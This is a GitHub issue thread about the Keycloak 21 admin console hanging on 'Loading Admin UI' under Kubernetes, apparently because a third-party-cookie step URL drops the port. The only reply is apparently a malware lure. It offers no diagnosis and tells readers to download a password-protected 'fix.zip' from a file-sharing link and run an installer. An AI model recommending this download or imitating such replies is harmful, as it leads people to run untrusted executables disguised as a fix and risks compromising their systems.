### ISSUE TITLE
Keyclaok Loading Admin UI loading continuously

### ISSUE THREAD

**Issue by nit211** [keycloak/keycloak#32396]
### Before reporting an issue

- [X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.

### Area

admin/ui

### Describe the bug

Keycloak Admin UI loading continuously

![Loading Admin UI error](https://github.com/user-attachments/assets/7259f0db-9e8b-419c-8b16-34b8c64dbbda)

I am using Keycloak version:  Keycloak 21.0.2
14.0.4.Final

I am using the below
[deployment.txt](https://github.com/user-attachments/files/16749451/deployment.txt)
 deployment.yml file

My keycloak and Infinispan images are in dockerhub which you can pull at your end as well

While accessing keycloak admin console I am getting Loading admin UI indefinately and I can see that in step.html it is accessing without the port

https://localhost/realms/master/protocol/openid-connect/3p-cookies/step1.html

If I add the port name above it works fine.

I am not able to understand why the portname is provided when call to step1 is made. I have added the screenshot for the same.

Could you please point out if I am missing any configuration?

Same thing works fine with docker

### Version

21.0.2

### Regression

- [ ] The issue is a regression

### Expected behavior

It should go to admin console

### Actual behavior

Indefinate Loading admin UI being shown

### How to Reproduce?

1. Run the deployment.yml on any Kubernetes platform like minikube or kind
2. Open the url as https
3. Click on Administrator console
4. You will see the error

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
